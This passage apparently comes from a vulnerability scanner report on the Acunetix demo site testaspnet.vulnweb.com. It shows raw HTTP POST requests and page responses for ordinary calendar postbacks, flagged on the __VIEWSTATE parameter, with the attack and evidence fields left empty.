style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8151&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA9LQXJ9oIZGRkHzStIgp52y3yxnSblMEDwd4e3TU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2Bi8aXCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPM52vuLXludYR%2F1hkwflx7liV7JI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:32 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCA9LQXJ9oIZGRkHzStIgp52y3yxnSblMEDwd4e3TU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+i8aXCQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPM52vuLXludYR/1hkwflx7liV7JI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:White" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8167&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAkFuqM9oIZGRk%2BvbHxxCTVD3oT%2BmUuHwVCIo%2FdSI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKkwubvBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP7mEAgmRqKcf1LEUvfwK9HQsNVi8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:30:04 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAkFuqM9oIZGRk+vbHxxCTVD3oT+mUuHwVCIo/dSI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKkwubvBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP7mEAgmRqKcf1LEUvfwK9HQsNVi8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:White" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 